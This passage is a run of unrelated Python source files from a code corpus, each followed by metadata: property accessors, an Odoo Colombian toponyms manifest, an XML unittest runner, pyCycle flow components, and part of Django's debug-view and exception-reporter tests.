def get_ymin(self):
return self._ymin
def get_ymax(self):
return self._ymax
def get_zmin(self):
return self._zmin
def get_zmax(self):
return self._zmax
def set_xmin(self, value):
self._xmin = value
def set_xmax(self, value):
self._xmax = value
def set_ymin(self, value):
self._ymin = value
def set_ymax(self, value):
self._ymax = value
def set_zmin(self, value):
self._zmin = value
def set_zmax(self, value):
self._zmax = value
def del_xmin(self):
del self._xmin
def del_xmax(self):
del self._xmax
def del_ymin(self):
del self._ymin
def del_ymax(self):
del self._ymax
def del_zmin(self):
del self._zmin
def del_zmax(self):
del self._zmax
xmin = property(get_xmin, set_xmin, del_xmin, "xmin's docstring")
xmax = property(get_xmax, set_xmax, del_xmax, "xmax's docstring")
ymin = property(get_ymin, set_ymin, del_ymin, "ymin's docstring")
ymax = property(get_ymax, set_ymax, del_ymax, "ymax's docstring")
zmin = property(get_zmin, set_zmin, del_zmin, "zmin's docstring")
zmax = property(get_zmax, set_zmax, del_zmax, "zmax's docstring")
| gpl-3.0 | 2,618,379,122,339,298,300 | 26.655172 | 69 | 0.576419 | false |
OSSESAC/odoopubarquiluz | extra-addons/l10n_co_toponyms/__openerp__.py | 8 | 1623 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012 Gabriel Henao.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
"name": "Colombia Localization Toponyms",
"version": "1.0",
"description": """
Colombian toponyms.
Lista de departamentos y municipios colombianos
""",
"author": "Gabriel Henao and Cubic ERP",
"website": "http://cubicERP.com",
"category": "Localization/Toponyms",
"depends": [
"base_state_ubication",
],
"data":[
"l10n_states_co_data.xml",
"l10n_cities_co_data.xml",
],
"demo_xml": [
],
"update_xml": [
],
"active": False,
"installable": True,
"certificate" : "",
"images": [
],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -328,470,862,157,085,950 | 31.46 | 78 | 0.583487 | false |
disqus/mule | mule/runners/xml.py | 1 | 7409 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
"""unittest-xml-reporting is a PyUnit-based TestRunner that can export test
results to XML files that can be consumed by a wide range of tools, such as
build systems, IDEs and Continuous Integration servers.
This module provides the XMLTestRunner class, which is heavily based on the
default TextTestRunner. This makes the XMLTestRunner very simple to use.
The script below, adapted from the unittest documentation, shows how to use
XMLTestRunner in a very simple way. In fact, the only difference between this
script and the original one is the last line:
import random
import unittest
import xmlrunner
class TestSequenceFunctions(unittest.TestCase):
def setUp(self):
self.seq = range(10)
def test_shuffle(self):
# make sure the shuffled sequence does not lose any elements
random.shuffle(self.seq)
self.seq.sort()
self.assertEqual(self.seq, range(10))
def test_choice(self):
element = random.choice(self.seq)
self.assert_(element in self.seq)
def test_sample(self):
self.assertRaises(ValueError, random.sample, self.seq, 20)
for element in random.sample(self.seq, 5):
self.assert_(element in self.seq)
if __name__ == '__main__':
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='test-reports'))
"""
import os
from mule.runners.text import _TextTestResult, TextTestRunner, _TestInfo
class _XMLTestResult(_TextTestResult):
"A test result class that can express test results in a XML report."
def _get_info_by_testcase(self):
"""This method organizes test results by TestCase module. This
information is used during the report generation, where a XML report
will be generated for each TestCase.
"""
tests_by_testcase = {}
for tests in (self.successes, self.failures, self.errors, self.skipped):
for test_info in tests:
testcase = type(test_info.test_method)
# Ignore module name if it is '__main__'
module = testcase.__module__ + '.'
if module == '__main__.':
module = ''
testcase_name = module + testcase.__name__
if not tests_by_testcase.has_key(testcase_name):
tests_by_testcase[testcase_name] = []
tests_by_testcase[testcase_name].append(test_info)
return tests_by_testcase
@classmethod
def _report_testsuite(cls, suite_name, tests, xml_document):
"Appends the testsuite section to the XML document."
testsuite = xml_document.createElement('testsuite')
xml_document.appendChild(testsuite)
testsuite.setAttribute('name', suite_name)
testsuite.setAttribute('tests', str(len(tests)))
testsuite.setAttribute('time', '%.3f' % \
sum(map(lambda e: e.get_elapsed_time(), tests)))
failures = filter(lambda e: e.outcome==_TestInfo.FAILURE, tests)
testsuite.setAttribute('failures', str(len(failures)))
errors = filter(lambda e: e.outcome==_TestInfo.ERROR, tests)
testsuite.setAttribute('errors', str(len(errors)))
skipped = filter(lambda e: e.outcome==_TestInfo.SKIPPED, tests)
testsuite.setAttribute('skips', str(len(skipped)))
return testsuite
@classmethod
def _report_testcase(cls, suite_name, test_result, xml_testsuite, xml_document):
"Appends a testcase section to the XML document."
testcase = xml_document.createElement('testcase')
xml_testsuite.appendChild(testcase)
testcase.setAttribute('classname', suite_name)
testcase.setAttribute('name', test_result.test_method._testMethodName)
testcase.setAttribute('time', '%.3f' % test_result.get_elapsed_time())
if (test_result.outcome != _TestInfo.SUCCESS):
elem_name = ('failure', 'error', 'skip')[test_result.outcome-1]
failure = xml_document.createElement(elem_name)
testcase.appendChild(failure)
failure.setAttribute('type', test_result.err[0].__name__)
failure.setAttribute('message', str(test_result.err[1]))
error_info = test_result.get_error_info()
failureText = xml_document.createCDATASection(error_info)
failure.appendChild(failureText)
@classmethod
def _report_output(cls, suite, tests, test_runner, xml_testsuite, xml_document):
"Appends the system-out and system-err sections to the XML document."
systemout = xml_document.createElement('system-out')
xml_testsuite.appendChild(systemout)
stdout = '\n'.join(filter(None, (t.test_method.stdout.getvalue() for t in tests))).strip()
systemout_text = xml_document.createCDATASection(stdout)
systemout.appendChild(systemout_text)
systemerr = xml_document.createElement('system-err')
xml_testsuite.appendChild(systemerr)
stderr = '\n'.join(filter(None, (t.test_method.stderr.getvalue() for t in tests))).strip()
systemerr_text = xml_document.createCDATASection(stderr)
systemerr.appendChild(systemerr_text)
def generate_reports(self, test_runner):
"Generates the XML reports to a given XMLTestRunner object."
from xml.dom.minidom import Document
all_results = self._get_info_by_testcase()
if type(test_runner.output) == str and not \
os.path.exists(test_runner.output):
os.makedirs(test_runner.output)
for suite, tests in all_results.items():
doc = Document()
# Build the XML file
testsuite = _XMLTestResult._report_testsuite(suite, tests, doc)
for test in tests:
_XMLTestResult._report_testcase(suite, test, testsuite, doc)
_XMLTestResult._report_output(suite, tests, test_runner, testsuite, doc)
xml_content = doc.toprettyxml(indent='\t')
if type(test_runner.output) is str:
report_file = open(os.path.join(test_runner.output, '%s.xml' % (suite,)), 'w')
try:
report_file.write(xml_content)
finally:
report_file.close()
else:
# Assume that test_runner.output is a stream
test_runner.output.write(xml_content)
class XMLTestRunner(TextTestRunner):
"""A test runner class that outputs the results in JUnit like XML files."""
def __init__(self, output='xunit', **kwargs):
super(XMLTestRunner, self).__init__(**kwargs)
self.output = output
def _makeResult(self):
"""Create the TestResult object which will be used to store
information about the executed tests.
"""
return _XMLTestResult(self.stream, self.descriptions, \
self.verbosity, self.elapsed_times)
def run(self, test):
"Run the given test case or test suite."
result = super(XMLTestRunner, self).run(test)
# self.stream.writeln('Generating XML reports...')
result.generate_reports(self)
return result | apache-2.0 | -2,458,362,929,389,439,000 | 39.271739 | 98 | 0.623296 | false |
HyperloopTeam/FullOpenMDAO | lib/python2.7/site-packages/pycycle-0.1-py2.7.egg/pycycle/start.py | 3 | 1501 | from openmdao.main.api import Component
from openmdao.lib.datatypes.api import Float, VarTree
from pycycle.flowstation import FlowStation, FlowStationVar
from pycycle.cycle_component import CycleComponent
class FlowStart(CycleComponent):
"""Flow initialization"""
W = Float(1, iotype="in", desc="mass flow rate", units="lbm/s")
Pt = Float(14.7, iotype="in", desc="total pressure", units="psi")
Tt = Float(518, iotype="in", desc="total temperature", units="degR")
Mach = Float(.1, iotype="in", desc="Mach Number")
area_des = Float(iotype="out", desc="flow area at the design condition")
Fl_O = FlowStationVar(iotype="out", desc="outgoing flow at the specified conditions", copy=None)
def execute(self):
Fl_O = self.Fl_O
Fl_O.setTotalTP(self.Tt, self.Pt)
Fl_O.W = self.W
Fl_O.Mach = self.Mach
if self.run_design:
self.area_des = Fl_O.area
class FlowStartStatic(CycleComponent):
W = Float(1, iotype="in", desc="mass flow rate", units="lbm/s")
Ps = Float(14.7, iotype="in", desc="total pressure", units="psi")
Ts = Float(518, iotype="in", desc="total temperature", units="degR")
Mach = Float(.1, iotype="in", desc="Mach Number")
Fl_O = FlowStationVar(iotype="out", desc="outgoing flow at the specified conditions", copy=None)
def execute(self):
self.Fl_O.setStaticTsPsMN(self.Ts, self.Ps, self.Mach)
self.Fl_O.W = self.W
self.Fl_O.Mach = self.Mach
| gpl-2.0 | -4,872,653,714,009,063,000 | 30.270833 | 100 | 0.650233 | false |
camilonova/django | tests/view_tests/tests/test_debug.py | 12 | 45828 | import importlib
import inspect
import os
import re
import sys
import tempfile
from io import StringIO
from django.conf.urls import url
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import DatabaseError, connection
from django.template import TemplateDoesNotExist
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import LoggingCaptureMixin, patch_logger
from django.urls import reverse
from django.utils.encoding import force_bytes
from django.utils.functional import SimpleLazyObject
from django.views.debug import (
CLEANSED_SUBSTITUTE, CallableSettingWrapper, ExceptionReporter,
cleanse_setting, technical_500_response,
)
from ..views import (
custom_exception_reporter_filter_view, index_page,
multivalue_dict_key_error, non_sensitive_view, paranoid_view,
sensitive_args_function_caller, sensitive_kwargs_function_caller,
sensitive_method_view, sensitive_view,
)
PY36 = sys.version_info >= (3, 6)
class User:
def __str__(self):
return 'jacob'
class WithoutEmptyPathUrls:
urlpatterns = [url(r'url/$', index_page, name='url')]
class CallableSettingWrapperTests(SimpleTestCase):
""" Unittests for CallableSettingWrapper
"""
def test_repr(self):
class WrappedCallable:
def __repr__(self):
return "repr from the wrapped callable"
def __call__(self):
pass
actual = repr(CallableSettingWrapper(WrappedCallable()))
self.assertEqual(actual, "repr from the wrapped callable")
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
class DebugViewTests(LoggingCaptureMixin, SimpleTestCase):
def test_files(self):
response = self.client.get('/raises/')
self.assertEqual(response.status_code, 500)
data = {
'file_data.txt': SimpleUploadedFile('file_data.txt', b'haha'),
}
response = self.client.post('/raises/', data)
self.assertContains(response, 'file_data.txt', status_code=500)
self.assertNotContains(response, 'haha', status_code=500)
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
# Ensure no 403.html template exists to test the default case.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
# Set up a test 403.html template.
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'loaders': [
('django.template.loaders.locmem.Loader', {
'403.html': 'This is a test template for a 403 error ({{ exception }}).',
}),
],
},
}])
def test_403_template(self):
response = self.client.get('/raises403/')
self.assertContains(response, 'test template', status_code=403)
self.assertContains(response, '(Insufficient Permissions).', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_raised_404(self):
response = self.client.get('/views/raises404/')
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
def test_404_not_in_urls(self):
response = self.client.get('/not-in-urls')
self.assertNotContains(response, "Raised by:", status_code=404)
self.assertContains(response, "<code>not-in-urls</code>, didn't match", status_code=404)
@override_settings(ROOT_URLCONF=WithoutEmptyPathUrls)
def test_404_empty_path_not_in_urls(self):
response = self.client.get('/')
self.assertContains(response, "The empty path didn't match any of these.", status_code=404)
def test_technical_404(self):
response = self.client.get('/views/technical404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.technical404", status_code=404)
def test_classbased_technical_404(self):
response = self.client.get('/views/classbased404/')
self.assertContains(response, "Raised by:", status_code=404)
self.assertContains(response, "view_tests.views.Http404View", status_code=404)
def test_non_l10ned_numeric_ids(self):
"""
Numeric IDs and fancy traceback context blocks line numbers shouldn't be localized.
"""
with self.settings(DEBUG=True, USE_L10N=True):
response = self.client.get('/raises500/')
# We look for a HTML fragment of the form
# '<div class="context" id="c38123208">', not '<div class="context" id="c38,123,208"'
self.assertContains(response, '<div class="context" id="', status_code=500)
match = re.search(b'<div class="context" id="(?P<id>[^"]+)">', response.content)
self.assertIsNotNone(match)
id_repr = match.group('id')
self.assertFalse(
re.search(b'[^c0-9]', id_repr),
"Numeric IDs in debug response HTML page shouldn't be localized (value: %s)." % id_repr.decode()
)
def test_template_exceptions(self):
try:
self.client.get(reverse('template_exception'))
except Exception:
raising_loc = inspect.trace()[-1][-2][0].strip()
self.assertNotEqual(
raising_loc.find("raise Exception('boom')"), -1,
"Failed to find 'raise Exception' in last frame of "
"traceback, instead found: %s" % raising_loc
)
def test_template_loader_postmortem(self):
"""Tests for not existing file"""
template_name = "notfound.html"
with tempfile.NamedTemporaryFile(prefix=template_name) as tmpfile:
tempdir = os.path.dirname(tmpfile.name)
template_path = os.path.join(tempdir, template_name)
with override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [tempdir],
}]):
response = self.client.get(reverse('raises_template_does_not_exist', kwargs={"path": template_name}))
self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
Make sure that the default URLconf template is shown shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>Congratulations on your first Django-powered page.</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
allow_database_queries = True
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with patch_logger('django.security.SuspiciousOperation', 'error'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = list('print %d' % i for i in range(1, 6))
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
os.write(fd, force_bytes(newline.join(LINES) + newline))
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError('Top level')
except AttributeError as explicit:
try:
raise ValueError('Second exception') from explicit
except ValueError:
raise IndexError('Final exception')
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages are twice on page -- one rendered as html,
# one as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format("Top level")))
self.assertEqual(2, html.count(implicit_exc.format("Second exception")))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format("Top level"), text)
self.assertIn(implicit_exc.format("Second exception"), text)
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertIn('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>%sError at /test_view/</h1>' % 'ModuleNotFound' if PY36 else 'Import', html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
value = '<td>items</td><td class="code"><pre>'Oops'</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre><InMemoryUploadedFile: '
'items (application/octet-stream)></pre></td>',
html
)
# COOKES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<td>items</td><td class="code"><pre>'Oops'</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
# COOKES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value'}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
